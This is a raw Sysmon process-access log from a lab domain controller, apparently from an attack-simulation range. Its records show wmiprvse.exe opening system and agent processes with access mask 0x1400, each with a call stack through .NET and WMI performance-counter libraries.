13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E000-000000009101}3324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005247Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005246Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005245Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005244Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005243Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005242Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005241Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005240Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005239Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005238Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005237Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005236Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005235Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005234Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005233Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005232Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program 